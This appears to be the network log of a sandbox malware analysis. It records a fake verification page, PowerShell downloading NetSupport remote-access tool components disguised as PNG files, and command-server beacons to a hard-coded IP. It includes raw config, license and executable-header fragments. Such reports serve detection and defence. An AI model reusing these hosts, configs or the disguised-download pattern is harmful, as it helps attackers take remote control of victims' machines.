                                                                                                                                                              Data Raw: 3b 20 6e 73 6b 62 66 6c 74 72 2e 69 6e 66 0d 0a 3b 0d 0a 3b 20 4e 53 20 4b 65 79 62 6f 61 72 64 20 46 69 6c 74 65 72 0d 0a 3b 20 0d 0a 3b 0d 0a 3b 20 54 68 69 73 20 69 6e 66 20 66 69 6c 65 20 69 6e 73 74 61 6c 6c 73 20 74 68 65 20 57 44 46 20 46 72 61 6d 65 77 6f 72 6b 20 62 69 6e 61 72 69 65 73 0d 0a 0d 0a 5b 56 65 72 73 69 6f 6e 5d 0d 0a 53 69 67 6e 61 74 75 72 65 3d 22 24 57 69 6e 64 6f 77 73 20 4e 54 24 22 0d 0a 50 72 6f 76 69 64 65 72 3d 4e 53 4c 0d 0a 0d 0a 0d 0a 3b 0d 0a 3b 2d 2d 2d 20 6e 73 6b 62 66 6c 74 72 20 43 6f 69 6e 73 74 61 6c 6c 65 72 20 69 6e 73 74 61 6c 6c 61 74 69 6f 6e 20 2d 2d 2d 2d 2d 2d 0d 0a 3b 0d 0a 0d 0a 0d 0a 5b 6e 73 6b 62 66 6c 74 72 2e 4e 54 2e 57 64 66 5d 0d 0a 4b 6d 64 66 53 65 72 76 69 63 65 20 3d 20 6e 73 6b 62 66 6c 74 72 2c 20 6e 73 6b 62 66 6c 74 72 5f 77 64 66 73 65 63 74 0d 0a 0d 0a 5b 6e 73 6b 62 66 6c 74 72 5f 77 64 66 73 65 63 74 5d 0d 0a 4b 6d 64 66 4c 69 62 72 61 72 79 56 65 72 73 69 6f 6e 20 3d 20 31 2e 35 0d 0a 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: ; nskbfltr.inf;; NS Keyboard Filter; ;; This inf file installs the WDF Framework binaries[Version]Signature="$Windows NT$"Provider=NSL;;--- nskbfltr Coinstaller installation ------;[nskbfltr.NT.Wdf]KmdfService = nskbfltr, nskbfltr_wdfsect[nskbfltr_wdfsect]KmdfLibraryVersion = 1.5
                                                                                                                                                              Oct 28, 2024 19:46:19.280273914 CET155OUTGET /o/5.png HTTP/1.1
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                              Host: traversecityspringbreak.com
                                                                                                                                                              Oct 28, 2024 19:46:19.442967892 CET1236INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.26.2
                                                                                                                                                              Date: Mon, 28 Oct 2024 18:46:19 GMT
                                                                                                                                                              Content-Type: image/png
                                                                                                                                                              Content-Length: 6458
                                                                                                                                                              Last-Modified: Mon, 21 Oct 2024 07:35:56 GMT
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              ETag: "6716045c-193a"
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              Data Raw: 0d 0a 5b 47 65 6e 65 72 61 6c 5d 0d 0a 43 6c 69 65 6e 74 50 61 72 61 6d 73 3d 0d 0a 43 4c 49 45 4e 54 33 32 3d 0d 0a 49 6e 73 74 61 6c 6c 64 69 72 3d 0d 0a 4e 4f 41 52 50 3d 0d 0a 53 75 70 70 72 65 73 73 41 75 64 69 6f 3d 0d 0a 0d 0a 0d 0a 5b 46 65 61 74 75 72 65 73 5d 0d 0a 43 6c 69 65 6e 74 3d 31 0d 0a 43 6f 6e 66 69 67 75 72 61 74 6f 72 3d 0d 0a 43 6f 6e 74 72 6f 6c 3d 0d 0a 47 61 74 65 77 61 79 3d 0d 0a 50 49 4e 53 65 72 76 65 72 3d 0d 0a 52 65 6d 6f 74 65 44 65 70 6c 6f 79 3d 0d 0a 53 63 72 69 70 74 69 6e 67 3d 0d 0a 53 74 75 64 65 6e 74 3d 0d 0a 54 65 63 68 43 6f 6e 73 6f 6c 65 3d 0d 0a 54 75 74 6f 72 3d 0d 0a 0d 0a 0d 0a 5b 53 74 61 72 74 4d 65 6e 75 49 63 6f 6e 73 5d 0d 0a 43 6c 69 65 6e 74 49 63 6f 6e 3d 0d 0a 43 6f 6e 66 69 67 49 63 6f 6e 3d 0d 0a 43 6f 6e 74 72 6f 6c 49 63 6f 6e 3d 0d 0a 52 65 6d 6f 74 65 44 65 70 6c 6f 79 49 63 6f 6e 3d 0d 0a 53 63 72 69 70 74 69 6e 67 49 63 6f 6e 3d 0d 0a 54 65 63 68 43 6f 6e 73 6f 6c 65 49 63 6f 6e 3d 0d 0a 54 75 74 6f 72 49 63 6f 6e 3d 0d 0a 0d 0a 0d [TRUNCATED]
                                                                                                                                                              Data Ascii: [General]ClientParams=CLIENT32=Installdir=NOARP=SuppressAudio=[Features]Client=1Configurator=Control=Gateway=PINServer=RemoteDeploy=Scripting=Student=TechConsole=Tutor=[StartMenuIcons]ClientIcon=ConfigIcon=ControlIcon=RemoteDeployIcon=ScriptingIcon=TechConsoleIcon=TutorIcon=[DesktopIcons]ControlDeskIcon=TechConsoleDeskIcon=TutorDeskIcon=; This NSM.ini file can be used to customise the component selections when performing a silent installation of the product.; Client=<1/Blank>; e.g.; Client=1; Controls whether the client component is installed (1) on the target machine or not (Blank);; CLIENT32=<blank/not blank>; e.g.; CLIENT32=; Setting this to anything causes the Client Service (if installed) to be set to manual start rather than automatic;; ClientIcon=<1/Blank>; e.g.; ClientIcon=1; Controls whether shortcut icons are placed
                                                                                                                                                              Oct 28, 2024 19:46:19.484765053 CET155OUTGET /o/6.png HTTP/1.1
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                              Host: traversecityspringbreak.com
                                                                                                                                                              Oct 28, 2024 19:46:19.647103071 CET495INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.26.2
                                                                                                                                                              Date: Mon, 28 Oct 2024 18:46:19 GMT
                                                                                                                                                              Content-Type: image/png
                                                                                                                                                              Content-Length: 257
                                                                                                                                                              Last-Modified: Mon, 21 Oct 2024 07:35:56 GMT
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              ETag: "6716045c-101"
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              Data Raw: 31 32 30 30 0d 0a 30 78 33 62 63 62 33 34 38 65 0d 0a 0d 0a 3b 20 4e 65 74 53 75 70 70 6f 72 74 20 4c 69 63 65 6e 73 65 20 46 69 6c 65 2e 0d 0a 3b 20 47 65 6e 65 72 61 74 65 64 20 6f 6e 20 31 31 3a 35 34 20 2d 20 32 31 2f 30 33 2f 32 30 31 38 0d 0a 0d 0a 0d 0a 0d 0a 5b 5b 45 6e 66 6f 72 63 65 5d 5d 0d 0a 0d 0a 5b 5f 4c 69 63 65 6e 73 65 5d 0d 0a 63 6f 6e 74 72 6f 6c 5f 6f 6e 6c 79 3d 30 0d 0a 65 78 70 69 72 79 3d 0d 0a 69 6e 61 63 74 69 76 65 3d 30 0d 0a 6c 69 63 65 6e 73 65 65 3d 45 56 41 4c 55 53 49 4f 4e 0d 0a 6d 61 78 73 6c 61 76 65 73 3d 35 30 30 30 0d 0a 6f 73 32 3d 31 0d 0a 70 72 6f 64 75 63 74 3d 31 30 0d 0a 73 65 72 69 61 6c 5f 6e 6f 3d 4e 53 4d 31 36 35 33 34 38 0d 0a 73 68 72 69 6e 6b 5f 77 72 61 70 3d 30 0d 0a 74 72 61 6e 73 70 6f 72 74 3d 30 0d 0a
                                                                                                                                                              Data Ascii: 12000x3bcb348e; NetSupport License File.; Generated on 11:54 - 21/03/2018[[Enforce]][_License]control_only=0expiry=inactive=0licensee=EVALUSIONmaxslaves=5000os2=1product=10serial_no=NSM165348shrink_wrap=0transport=0
                                                                                                                                                              Oct 28, 2024 19:46:19.676594019 CET155OUTGET /o/7.png HTTP/1.1
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                              Host: traversecityspringbreak.com
                                                                                                                                                              Oct 28, 2024 19:46:19.838654995 CET241INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.26.2
                                                                                                                                                              Date: Mon, 28 Oct 2024 18:46:19 GMT
                                                                                                                                                              Content-Type: image/png
                                                                                                                                                              Content-Length: 33144
                                                                                                                                                              Last-Modified: Mon, 21 Oct 2024 07:35:56 GMT
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              ETag: "6716045c-8178"
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              Oct 28, 2024 19:46:19.907960892 CET155OUTGET /o/8.png HTTP/1.1
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                              Host: traversecityspringbreak.com
                                                                                                                                                              Oct 28, 2024 19:46:20.094052076 CET1236INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.26.2
                                                                                                                                                              Date: Mon, 28 Oct 2024 18:46:19 GMT
                                                                                                                                                              Content-Type: image/png
                                                                                                                                                              Content-Length: 18808
                                                                                                                                                              Last-Modified: Mon, 21 Oct 2024 07:35:56 GMT
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              ETag: "6716045c-4978"
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 73 76 0a bb 37 17 64 e8 37 17 64 e8 37 17 64 e8 2c 8a f8 e8 35 17 64 e8 2c 8a ce e8 34 17 64 e8 3e 6f f7 e8 30 17 64 e8 37 17 65 e8 0f 17 64 e8 2c 8a ca e8 33 17 64 e8 2c 8a ff e8 36 17 64 e8 2c 8a fe e8 36 17 64 e8 2c 8a f9 e8 36 17 64 e8 52 69 63 68 37 17 64 e8 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 66 88 bb 55 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0a 00 00 06 00 00 00 16 00 00 00 00 00 00 a0 10 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 00 00 00 04 00 00 b8 de 00 00 02 00 40 05 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$sv7d7d7d,5d,4d>o0d7ed,3d,6d,6d,6dRich7dPELfU! `@p"a P@ x)P@ @.text$ `.rdata @@.data0@.rsrc@@@.relocP@B
                                                                                                                                                              Oct 28, 2024 19:46:20.149188042 CET155OUTGET /o/9.png HTTP/1.1
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                              Host: traversecityspringbreak.com
                                                                                                                                                              Oct 28, 2024 19:46:20.316950083 CET245INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.26.2
                                                                                                                                                              Date: Mon, 28 Oct 2024 18:46:20 GMT
                                                                                                                                                              Content-Type: image/png
                                                                                                                                                              Content-Length: 3735416
                                                                                                                                                              Last-Modified: Mon, 21 Oct 2024 07:36:03 GMT
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              ETag: "67160463-38ff78"
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              Oct 28, 2024 19:46:25.058712006 CET156OUTGET /o/10.png HTTP/1.1
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                              Host: traversecityspringbreak.com
                                                                                                                                                              Oct 28, 2024 19:46:25.237970114 CET1236INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.26.2
                                                                                                                                                              Date: Mon, 28 Oct 2024 18:46:25 GMT
                                                                                                                                                              Content-Type: image/png
                                                                                                                                                              Content-Length: 77280
                                                                                                                                                              Last-Modified: Mon, 21 Oct 2024 07:35:58 GMT
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              ETag: "6716045e-12de0"
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 67 cb 8f 56 23 aa e1 05 23 aa e1 05 23 aa e1 05 4c dc 7f 05 32 aa e1 05 2a d2 72 05 26 aa e1 05 23 aa e0 05 74 aa e1 05 4c dc 4b 05 75 aa e1 05 4c dc 4a 05 3e aa e1 05 4c dc 7b 05 22 aa e1 05 4c dc 7c 05 22 aa e1 05 52 69 63 68 23 aa e1 05 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 54 17 6f 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 82 00 00 00 4a 00 00 00 00 00 00 b4 21 00 00 00 10 00 00 00 a0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 20 01 00 00 04 00 00 51 1b 02 00 03 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$gV###L2*r&#tLKuLJ>L{"L|"Rich#PELToeJ!@ Q@<8]@@.text `.rdata,%&@@.data-@.rsrc8@@.relocp@B
                                                                                                                                                              Oct 28, 2024 19:46:25.533421993 CET156OUTGET /o/11.png HTTP/1.1
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                              Host: traversecityspringbreak.com
                                                                                                                                                              Oct 28, 2024 19:46:25.701092958 CET1236INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.26.2
                                                                                                                                                              Date: Mon, 28 Oct 2024 18:46:25 GMT
                                                                                                                                                              Content-Type: image/png
                                                                                                                                                              Content-Length: 396664
                                                                                                                                                              Last-Modified: Mon, 21 Oct 2024 07:35:59 GMT
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              ETag: "6716045f-60d78"
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 88 e0 14 d6 cc 81 7a 85 cc 81 7a 85 cc 81 7a 85 a3 f7 d1 85 c9 81 7a 85 d7 1c e4 85 d4 81 7a 85 c5 f9 e9 85 c7 81 7a 85 cc 81 7b 85 59 81 7a 85 d7 1c d0 85 4b 81 7a 85 d7 1c d1 85 f7 81 7a 85 d7 1c e1 85 cd 81 7a 85 d7 1c e0 85 cd 81 7a 85 d7 1c e7 85 cd 81 7a 85 52 69 63 68 cc 81 7a 85 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 59 3f 58 56 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0a 00 00 c6 04 00 00 1a 01 00 00 00 00 00 f7 da 02 00 00 10 00 00 00 e0 04 00 00 00 15 10 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 90 06 00 00 04 00 00 27 cb 06 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$zzzzzz{YzKzzzzzRichzPELY?XV!'@oTx0@x)@\E`d@h.text `.rdata/@@.datah|@.rsrc@0@@.reloc F@H@B
                                                                                                                                                              Oct 28, 2024 19:46:26.320980072 CET156OUTGET /o/12.png HTTP/1.1
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                              Host: traversecityspringbreak.com
                                                                                                                                                              Oct 28, 2024 19:46:26.502312899 CET243INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.26.2
                                                                                                                                                              Date: Mon, 28 Oct 2024 18:46:26 GMT
                                                                                                                                                              Content-Type: image/png
                                                                                                                                                              Content-Length: 120288
                                                                                                                                                              Last-Modified: Mon, 21 Oct 2024 07:36:03 GMT
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              ETag: "67160463-1d5e0"
                                                                                                                                                              Accept-Ranges: bytes


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              1192.168.2.164972992.255.85.1354437368C:\Users\user\AppData\Roaming\bpsFyf\client32.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Oct 28, 2024 19:46:35.210639000 CET218OUTPOST http://92.255.85.135/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 92.255.85.135Connection: Keep-AliveCMD=POLLINFO=1ACK=1
                                                                                                                                                              Data Raw:
                                                                                                                                                              Data Ascii:


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              2192.168.2.1649730172.67.68.212807368C:\Users\user\AppData\Roaming\bpsFyf\client32.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Oct 28, 2024 19:46:35.340961933 CET118OUTGET /location/loca.asp HTTP/1.1
                                                                                                                                                              Host: geo.netsupportsoftware.com
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                              Oct 28, 2024 19:46:36.329104900 CET788INHTTP/1.1 200 OK
                                                                                                                                                              Date: Mon, 28 Oct 2024 18:46:36 GMT
                                                                                                                                                              Content-Type: text/html; Charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              CF-Ray: 8d9d16ea1801e9a4-DFW
                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                              Cache-Control: private
                                                                                                                                                              Set-Cookie: ASPSESSIONIDQSACCQTB=LCDFNODDLKCMHEMABOOHJHDF; path=/
                                                                                                                                                              cf-apo-via: origin,host
                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cvIhPyf4Xj8xYqUnCu5UMzWUCamcLZoZO0SXIcZj1wbYqlnOMY6MRsHZ9%2FMMEz7vOtl4XQh5Yv9Vpxc5qHJ47CHc1AuQQfqjjH%2BrXG8HZwLuH2%2BduXd8mT%2B9TbiTtAaArKKhBilAQA%2BPQWl9"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              Data Raw: 66 0d 0a 33 32 2e 37 37 36 37 2c 2d 39 36 2e 37 39 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: f32.7767,-96.7970


                                                                                                                                                              HTTPS Proxied Packets

                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              0192.168.2.1649698166.1.160.754436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-10-28 18:45:15 UTC679OUTGET /Ray-verify.html HTTP/1.1
                                                                                                                                                              Host: inspyrehomedesign.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                              Sec-Fetch-Mode: navigate
                                                                                                                                                              Sec-Fetch-User: ?1
                                                                                                                                                              Sec-Fetch-Dest: document
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              2024-10-28 18:45:15 UTC279INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.26.2
                                                                                                                                                              Date: Mon, 28 Oct 2024 18:45:15 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Content-Length: 10478
                                                                                                                                                              Connection: close
                                                                                                                                                              Last-Modified: Mon, 21 Oct 2024 07:55:44 GMT
                                                                                                                                                              ETag: "28ee-624f7fad44000"
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                              2024-10-28 18:45:15 UTC10478INData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 27 20 63 6f 6e 74 65 6e 74 3d 27 45 6d 75 6c 61 74 65 49 45 39 27 3e 3c 4d 45 54 41 20 4e 41 4d 45 3d 27 47 45 4e 45 52 41 54 4f 52 27 20 43 6f 6e 74 65 6e 74 3d 27 54 68 65 20 73 6f 75 72 63 65 20 63 6f 64 65 20 6f 66 20 74 68 69 73 20 70 61 67 65 20 69 73 20 65 6e 63 72 79 70 74 65 64 20 77 69 74 68 20 48 54 4d 4c 20 47 75 61 72 64 69 61 6e 2c 20 20 74 68 65 20 77 6f 72 6c 64 27 73 20 73 74 61 6e 64 61 72 74 20 66 6f 72 20 77 65 62 73 69 74 65 20 70 72 6f 74 65 63 74 69 6f 6e 2e 20 56 69 73 69 74 20 68 74 74 70 3a 2f 2f 77 77 77 2e 70 72 6f 74 77 61 72 65 2e 63 6f 6d 20 66 6f 72 20 64 65 74 61 69 6c 73 27 3e 3c 6d 65 74
                                                                                                                                                              Data Ascii: <html><head><meta http-equiv='x-ua-compatible' content='EmulateIE9'><META NAME='GENERATOR' Content='The source code of this page is encrypted with HTML Guardian, the world's standart for website protection. Visit http://www.protware.com for details'><met


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              1192.168.2.1649699166.1.160.754436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-10-28 18:45:15 UTC613OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                              Host: inspyrehomedesign.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                              Referer: https://inspyrehomedesign.com/Ray-verify.html
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              2024-10-28 18:45:15 UTC170INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.26.2
                                                                                                                                                              Date: Mon, 28 Oct 2024 18:45:15 GMT
                                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                              Content-Length: 284
                                                                                                                                                              Connection: close
                                                                                                                                                              2024-10-28 18:45:15 UTC284INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 69 6e 73 70 79 72 65 68 6f 6d 65 64 65 73 69 67 6e 2e 63 6f 6d 20 50 6f 72 74 20
                                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at inspyrehomedesign.com Port


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              2192.168.2.1649712184.28.90.27443
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-10-28 18:45:23 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Accept: */*
                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                              User-Agent: Microsoft BITS/7.8
                                                                                                                                                              Host: fs.microsoft.com
                                                                                                                                                              2024-10-28 18:45:23 UTC467INHTTP/1.1 200 OK
                                                                                                                                                              Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                              ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                              Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                              Server: ECAcc (lpl/EF06)
                                                                                                                                                              X-CID: 11
                                                                                                                                                              X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                              X-Ms-Region: prod-weu-z1
                                                                                                                                                              Cache-Control: public, max-age=165657
                                                                                                                                                              Date: Mon, 28 Oct 2024 18:45:23 GMT
                                                                                                                                                              Connection: close
                                                                                                                                                              X-CID: 2


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              3192.168.2.1649713184.28.90.27443
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-10-28 18:45:24 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Accept: */*
                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                              If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                              Range: bytes=0-2147483646
                                                                                                                                                              User-Agent: Microsoft BITS/7.8
                                                                                                                                                              Host: fs.microsoft.com
                                                                                                                                                              2024-10-28 18:45:25 UTC515INHTTP/1.1 200 OK
                                                                                                                                                              ApiVersion: Distribute 1.1
                                                                                                                                                              Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                              ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                              Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                              Server: ECAcc (lpl/EF06)
                                                                                                                                                              X-CID: 11
                                                                                                                                                              X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                              X-Ms-Region: prod-weu-z1
                                                                                                                                                              Cache-Control: public, max-age=151870
                                                                                                                                                              Date: Mon, 28 Oct 2024 18:45:24 GMT
                                                                                                                                                              Content-Length: 55
